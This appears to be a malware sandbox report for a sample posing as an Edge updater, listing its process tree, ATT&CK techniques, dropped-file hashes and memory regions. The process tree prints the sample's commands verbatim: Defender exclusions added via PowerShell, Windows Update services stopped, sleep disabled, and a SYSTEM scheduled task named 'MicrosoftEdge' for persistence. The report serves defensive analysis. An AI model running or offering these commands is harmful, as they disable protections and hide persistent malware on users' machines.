  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1568
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4756
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4652
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:392
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1360
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:3944
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3512
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3336
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3536
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"
  2⤵
  PID:2880
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2712
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2932
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2292
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3396
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4848
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1928
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1344
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1620
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:760
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5112
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2084
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2008
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2812
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1512
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2680
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1788
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:5116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3492

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4040

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2488

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4452

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3696

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
050567a067ffea4eb40fe2eefebdc1ee

SHA1
6e1fb2c7a7976e0724c532449e97722787a00fec

SHA256
3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

SHA512
341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_addfzthh.you.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cli_gui.exe

Filesize
2.9MB

MD5
8f21c4390128917bf5af5c2ee3fbc592

SHA1
733cc166b3161772755edf69314003a4a5e87953

SHA256
78b628830cd84013ba1bdab6c5f4a1529f828119157a77d212d86e82f35a817b

SHA512
c5116b27a4f722168c934319cd804a0390490be8341f27d39337877ce1c14e72c3dcdf725b982961c14de0a3da96362f2a9d4f4c486b7658c87c4801155cb015

Download Submit
C:\Windows\System32\updater.exe

Filesize
5.7MB

MD5
8cd62e3ece85c4c3e9f6f7c816256adf

SHA1
9712769be3f755c5ecbe68d38800a3a8ecdaf324

SHA256
39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b

SHA512
a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
dbbd2d4458d7e8094846420da595dfc3

SHA1
267cb47b904f14a519d2bd73abfdb30e1a06e1a6

SHA256
e27390d57580e3dfba07bec3d8e430203bbc91e90f6937079b3fd52abc721bd4

SHA512
480e7ca865b811f79f35fcfe7a9ac0280b48d1f9459873d18f000db55c72d53345cf3a10075c1ac407439545f699ce2a7bef38b00b4e19439edf384b00045531

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f2dd68ab8e611f0143c6ad176f223ae9

SHA1
30f580175773f251a9572fe757de6eaef6844abc

SHA256
f935809085e90f8fc2c003afb46e81de28f3312ec097cf46f2bdc2488cb893e7

SHA512
f664b850c2fc6773e48171be5c180d8bc5c3a27945f5e6604605006a3c93e0bf3a516b647d6411a4d6b75bdf0a5e15b4f3621bf5702bbc3c46f9b517cb69dd04

Download Submit
memory/428-73-0x0000025B2AD10000-0x0000025B2AD37000-memory.dmp

Filesize
156KB

Download
memory/428-74-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/560-81-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/560-80-0x000002B5C38F0000-0x000002B5C3917000-memory.dmp

Filesize
156KB

Download
memory/636-63-0x000001A8000E0000-0x000001A800101000-memory.dmp

Filesize
132KB

Download
memory/636-65-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/636-64-0x000001A800110000-0x000001A800137000-memory.dmp

Filesize
156KB

Download
memory/696-69-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/696-68-0x000001DD58A60000-0x000001DD58A87000-memory.dmp

Filesize
156KB

Download
memory/984-77-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/984-76-0x000002669AFA0000-0x000002669AFC7000-memory.dmp

Filesize
156KB

Download
memory/1004-84-0x000001C648DB0000-0x000001C648DD7000-memory.dmp

Filesize
156KB

Download
memory/1004-85-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1084-89-0x000001588F690000-0x000001588F6B7000-memory.dmp

Filesize
156KB

Download
memory/1084-90-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1176-92-0x000001891CD80000-0x000001891CDA7000-memory.dmp

Filesize
156KB

Download
memory/1176-93-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1192-100-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1192-99-0x000002C3539D0000-0x000002C3539F7000-memory.dmp

Filesize
156KB

Download
memory/1204-23-0x0000000000400000-0x0000000001892000-memory.dmp

Filesize
20.6MB

Download
memory/1204-3-0x0000000000400000-0x0000000001892000-memory.dmp

Filesize
20.6MB

Download
memory/1204-1-0x0000000000400000-0x0000000001892000-memory.dmp

Filesize
20.6MB

Download
memory/1204-0-0x0000000000400000-0x0000000001892000-memory.dmp

Filesize
20.6MB

Download
memory/1204-2-0x0000000000400000-0x0000000001892000-memory.dmp

Filesize
20.6MB

Download
memory/1260-103-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1260-102-0x000001804D720000-0x000001804D747000-memory.dmp

Filesize
156KB

Download
memory/1276-106-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1276-105-0x000001E118190000-0x000001E1181B7000-memory.dmp

Filesize
156KB

Download
memory/1316-109-0x00007FF8A5350000-0x00007FF8A5360000-memory.dmp

Filesize
64KB

Download
memory/1316-108-0x0000018C501D0000-0x0000018C501F7000-memory.dmp

Filesize
156KB

Download
memory/1804-37-0x00007FF6170F0000-0x00007FF617929000-memory.dmp

Filesize
8.2MB

Download
memory/1804-25-0x00007FF8E5367000-0x00007FF8E5369000-memory.dmp

Filesize
8KB

Download
memory/1804-20-0x00007FF6170F0000-0x00007FF617929000-memory.dmp

Filesize
8.2MB

Download
memory/2712-366-0x000001B3FFDA0000-0x000001B3FFDAA000-memory.dmp

Filesize
40KB

Download
memory/2712-364-0x000001B399200000-0x000001B39921C000-memory.dmp

Filesize
112KB

Download
memory/2712-365-0x000001B399220000-0x000001B3992D3000-memory.dmp

Filesize
716KB

Download
memory/2712-367-0x000001B3FFE80000-0x000001B3FFE9C000-memory.dmp

Filesize
112KB

Download
memory/2712-368-0x000001B3FFE20000-0x000001B3FFE2A000-memory.dmp

Filesize
40KB

Download
memory/2712-369-0x000001B3FFEA0000-0x000001B3FFEBA000-memory.dmp

Filesize
104KB

Download
memory/2712-370-0x000001B399530000-0x000001B399538000-memory.dmp

Filesize
32KB

Download
memory/2712-371-0x000001B399540000-0x000001B399546000-memory.dmp

Filesize
24KB

Download
memory/2712-372-0x000001B3FFE30000-0x000001B3FFE3A000-memory.dmp

Filesize
40KB

Download
memory/2912-51-0x00007FF8E3CE0000-0x00007FF8E3D9D000-memory.dmp

Filesize
756KB

Download
memory/2912-50-0x00007FF8E52C0000-0x00007FF8E54C9000-memory.dmp

Filesize
2.0MB

Download
memory/3208-28-0x00000178BC9A0000-0x00000178BC9C2000-memory.dmp

Filesize
136KB

Download
memory/4924-53-0x00007FF703380000-0x00007FF703945000-memory.dmp

Filesize
5.8MB

Download